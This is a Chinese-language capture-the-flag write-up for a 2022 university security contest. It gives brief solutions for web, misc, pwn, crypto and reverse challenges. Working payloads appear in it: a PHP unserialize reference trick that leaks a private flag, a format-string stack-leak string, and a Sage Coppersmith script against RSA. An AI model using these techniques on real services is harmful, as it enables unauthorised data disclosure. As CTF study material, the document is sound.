Web

你比香农都牛逼

直接看源码124.221.190.49/assets/index.9c4d6006.js

image-20220501154916963

控制台运行:flag{blue-whalerdle}

very old php game

image-20220501155025649

old php game

image-20220501155126682

Baby Unserialize

利用=&对变量进行引用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php

require_once "flag.php";

class Foo
{
private $i_am_flag;
public $i_am_not_flag;

public function __construct() {
$this->i_am_not_flag =& $this->i_am_flag;
}

// public function __destruct()
// {
// // You want my flag? There you are.
// global $flag;
// $this->i_am_flag = $flag;

// echo $this->i_am_not_flag;
// }

// public function __wakeup()
// {
// $this->i_am_not_flag = 'I am not flag!';
// }
}

$a = new Foo;
// $a->i_am_not_flag =& $a->i_am_flag;
echo base64_encode(serialize($a));
//TzozOiJGb28iOjI6e3M6MTQ6IgBGb28AaV9hbV9mbGFnIjtOO3M6MTM6ImlfYW1fbm90X2ZsYWciO1I6Mjt9

image-20220501155301459

企业级项目实训

Log4j2

image-20220501155651805

Misc

缺了好多工具,慢慢补全吧

Checkin

image-20220501160412088

simplepcap

wireshark,导出tcp链接的原始数据

image-20220501160814545

再用ida逆一下

image-20220501161136702

warmatap

每个案件对应不同的音符,听就行

出题人手抖多按了几个键,flag里别写就行了

bitjungle

盲水印可以解出另一个附件

image-20220501161305346

里面是一个图,图里有个加密的压缩包,解不出来了


赛后听群里师傅说,在小黄鸭图片的末尾有点东西,于是拖出来看看,转为utf8编码后,才发现这么个东西

image-20220502212019405

在线工具解一下:兽音译者在线编码解码 - 兽音翻译咆哮体加密解密 (iiilab.com)

image-20220502212036084

解压缩,getflag

flag{bitjungle_@_2022ouc_security_competation}

ps:这广告最后还是没打好,flag就没几个师傅看见

问卷

Pwn

flag_in_stack

白给格式化字符串

%9$p%10$p%11$p%12$p%13$p%14$p

image-20220501161439094

image-20220501161550408

最后flag是

flag{22318482-897e-4e4a-9b99-b9389177f8f3}

Crypto

rsa0

网上有exp,用sage跑

1
2
3
4
5
6
7
n=99458509668079240764185524318888149882712572088614461971298107463369834453088459456711728470353911743012102202401459506420834538745340718629443665356118527820744084764722600596423213368145625200314910178619550190760027522939148808084672161717108834912031065957105792556025057670251126369910028034643093394503
c1=89197280386921965661197790711420784410262382208534132234085116791910615673169858527481477831574905081301421275552903510097047200583014062866861073549357212721466816307907010360542055607004721289805632304584130841060138244596306574846436860126904020143491716153319277054077200643464827586604236845487354987915
c2=45959797671430481467332101148072465819627575670155123389013237210739239421635837916637386390202868822695476269782607749447310008721672509747039543011018639490424678005705921693560042291238100913368239888847987849534236313165006247961048196341554357508978141969877614250433715368123748776872299192957911667056
RR.<x>=Zmod(n)[]
f=x**Integer(2)-(c1+c2)*x + c1*c2
f.small_roots(X=2^400)
#[38321129010650526466511322627534659186847622818705021]

image-20220501163508824

Re

easyxor

image-20220501163710450

image-20220501163831006

xpu

脱壳,flag用base64加密了

image-20220501163951392

asm_master

gcc -c main.S -o main.o

image-20220501164034886

oh_my_python

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$ uncompyle6 chall.pyc > chall.py

$ cat chall.py
# uncompyle6 version 3.8.0
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.8.10 (default, Mar 15 2022, 12:22:08)
# [GCC 9.4.0]
# Embedded file name: chall.py
# Compiled at: 2022-02-23 14:51:34


def chall():
flag = input()
l = 'CKNOPWY_acfghkloruwy{}'
index = [10, 14, 8, 11, 20, 0, 8, 2, 7, 6, 3, 17, 7, 1, 3, 5, 2, 7, 12, 3, 5, 7, 4, 19, 9, 7, 18, 15, 16, 13, 21]
answer = ''
for i in index:
answer += l[i]

if flag == answer:
print 'Right!'
else:
print 'No!'


if __name__ == '__main__':
chall()
# okay decompiling chall.pyc

image-20220501164309919